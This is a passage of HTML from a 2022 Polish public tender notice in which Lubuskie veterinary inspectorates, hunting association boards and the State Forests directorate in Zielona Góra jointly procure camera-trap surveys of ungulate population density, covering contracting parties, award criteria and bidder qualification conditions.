class="normal">Krosno Odrzańskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 383 51 73</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krosnoodrz.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip-piwkrosnoodrz.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">20</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Międzyrzeczu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">210467379</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zakaszewskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzyrzecz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 741 22 38</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miedzyrzecz.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.piw.powiat-miedzyrzecki.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">21</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Nowej Soli</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971188871</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kossaka 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sól</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 458 38 58</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowasol.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.piwnowasol.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">22</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Słubicach z/s w Ośnie Lubuskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">210467280</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ośno Lubuskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 757 60 56</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">slubice.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.piwslubice.e-line.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">23</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Strzelcach Krajeńskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971310020</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stefana Wyszyńskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Krajeńskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 763 10 58</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">strzelcekraj.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://piwstrzelce.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">24</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Sulęcinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">211063299</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipowa 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulęcin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 755 00 40</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sulecin.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">piw-sulecin.4bip.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">25</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">25.	Powiatowy Inspektorat Weterynarii w Świebodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971183916</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zachodnia 58</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świebodzin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 382 25 54</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swiebodzin.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">piw-swiebodzin.4bip.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">26</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Żaganiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971306939</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szprotawska 30 B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żagań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 367 10 99</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zagan.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.piw.zagan.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">27</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Żarach z/s w Lubsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971187386</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 372 04 46</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zary.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">piw-zary.4bip.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">28</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Wschowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">080211252</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kazimierza Wielkiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wschowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 508 854 092</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wschowa.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bip.piwwschowa.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">29</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Okręgowy Polskiego Związku Łowieckiego w Zielonej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">000742279-00450</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-137</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 327 23 70</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zo.zielonagora@pzlow.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zielonagora.pzlow.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">30</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Okręgowy Polskiego Związku Łowieckiego w Gorzowie Wielkopolskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">000742279-00174</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kosynierów Gdyńskich 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 720 47 20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zo.gorzowwlkp@pzlow.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gorzow.pzlow.pl/</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Osoby wskazane w Decyzji nr 100 Dyrektora Regionalnej Dyrekcji Lasów Państwowych wchodzą w skład Komisji Przetargowej i wykonują swoje obowiązki zgodnie z Regulaminem prac komisji przetargowej (Zarządzenie nr 32 Dyrektora Regionalnej Dyrekcji Lasów Państwowych w Zielonej Górze z 21.12.2021r. zn.spr.DP.270.8.2021).</p> <h3 class="mb-0">1.10.) Właściwe przepisy w przypadku wspólnego udzielania zamówień z zamawiającymi z innych państw członkowskich UE</h3> <p class="mb-0">nie dotyczy</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wyk. oceny liczebności i zagęszczenia zwierząt za pom. fotopułapek na ter. leśnych, zgodnie z jedną z dost. metod szac. zagęszcz. pop. zwierzyny, takich jak: REM, distance sampling, REST” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d10c6297-37ed-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00359746</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00183893/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 „Usługa wyk. oceny liczebności i zagęszczenia zwierząt za pom. fotopułapek na ter. leśnych, zgodnie z jedną z dost. metod szac. zagęszcz. pop. zwierzyny, takich jak: REM, distance sampling, REST”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/0fb2d3fb-2bd7-477c-82a2-0d3f4cdc10ed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/0fb2d3fb-2bd7-477c-82a2-0d3f4cdc10ed</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest:<br/> Państwowe Gospodarstwo Leśne Lasy Państwowe Regionalna Dyrekcja Lasów Państwowych w Zielonej Górze<br/>	ul. Kazimierza Wielkiego 24a, 65-950 Zielona Góra, <br/>	Tel.: 68 455 85 00<br/> e-mail: rdlp@zielonagora.lasy.gov.pl<br/> Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Sebastiana Strzecha z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem biuro@comp-net.pl lub telefonicznie pod numerem +48 63 240 65 32.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DP.270.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 506100,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na wykonaniu oceny liczebności i zagęszczenia zwierząt za pomocą fotopułapek na terenach leśnych, zgodnie z jedną z dostępnych metod szacowania zagęszczenia populacji zwierzyny, takich jak: REM, distance sampling, REST.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77231500-3 - Usługi monitorowania lub oceny lasu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77230000-1 - Usługi doraźne dotyczące leśnictwa</p> <p class="mb-0">77231100-9 - Usługi zarządzania zasobami leśnymi</p> <p class="mb-0">77231400-2 - Usługi oceny zasobów leśnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I.	Cena – 60 %<br/>II.	Doświadczenie zawodowe osób wyznaczonych do realizacji zadania – 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">II.	W ramach kryterium „Doświadczenie zawodowe osób wyznaczonych do realizacji części zadania oraz samodzielna realizacja przez Wykonawcę kluczowych elementów zamówienia” ocenie poddane zostanie doświadczenie Kierownika projektu, Kierownika zespołu (drużyny) i osłony naukowej: a. Kierownik projektu – Kierownik projektu wykonawca otrzyma: 5 pkt. za każdy pełny rok doświadczenia w nadzorze nad pracami związanymi z monitoringiem kopytnych dla nadleśnictw ponad okres doświadczenia określony w warunkach udziału w postępowaniu. b. Osłona naukowa. Wykonawca otrzyma 2 punkty za każdy pełny rok prowadzenia badań naukowych dotyczących monitoringu liczebności kopytnych ponad okres doświadczenia określony w warunkach udziału w postępowaniu. Maksymalnie wykonawca otrzymać może 40 pkt. w ramach kryterium doświadczenie zawodowe.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> WARUNKI UDZIAŁU W POSTĘPOWANIU O UDZIELENIE ZAMÓWIENIA <br/><br/>1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do występowania w obrocie gospodarczym. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do tego warunku. <br/>4)	zdolności technicznej lub zawodowej<br/>a)	Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) Wykonawca zrealizował lub realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy) co najmniej 1 usługę (przez usługę rozumie się wykonywanie prac na podstawie 1 umowy) polegającą na wykonywaniu prac z zakresu monitoringu liczebności zwierząt kopytnych dla minimum 2 nadleśnictw PGLLP z wykorzystaniem foto pułapek na łączną kwotę nie niższą niż 200.000 zł brutto<br/>b)	Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do zdolności technicznej lub zawodowej w zakresie potencjału technicznego. <br/>c)	Zamawiający formułuje warunek udziału w postępowaniu w odniesieniu do zdolności technicznej lub zawodowej w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować następującymi osobami <br/>– 1 osoba na stanowisku: Kierownika projektu (pracownik z wykształceniem wyższym leśnym lub zootechnicznym, z co najmniej 5 letnim doświadczeniem w pracy w zakresie monitoringu liczebności zwierząt kopytnych, który w okresie stażu pracy nadzorował pracę zespołu, określającego liczebność zwierząt kopytnych z wykorzystaniem foto pułapek przynajmniej w dwóch nadleśnictwach); <br/>- 2 osoby na stanowisku: Specjalisty do spraw analiz danych z foto pułapek (pracownik z wykształceniem wyższym leśnym lub zootechnicznym, z co najmniej 3 letnim doświadczeniem w pracy w zakresie monitoringu liczebności zwierząt kopytnych, który w okresie stażu pracy był członkiem zespołu określającego liczebność zwierząt kopytnych z wykorzystaniem foto pułapek przynajmniej w dwóch nadleśnictwach.	<br/>- 1 osoba w charakterze osłony naukowej (eksperta): (pracownik, który posiada wykształcenie wyższe leśne lub biologiczne (co najmniej doktorat z zakresu nauk przyrodniczych lub pokrewnych) oraz prowadził badania naukowe lub monitoring liczebności zwierząt kopytnych przynajmniej w 2 nadleśnictwach LP z wykorzystaniem foto pułapek.	<br/><br/>2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 8.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 6.1. powinni spełniać łącznie wszyscy Wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>4.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W przypadku korzystania z zasobów podmiotu trzeciego w zakresie warunku udziału w postępowaniu opisanego w pkt 6.1.ppkt 4) lit. a) SWZ, warunek ten winien spełniać co najmniej podmiot trzeci w całości.<br/>	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji 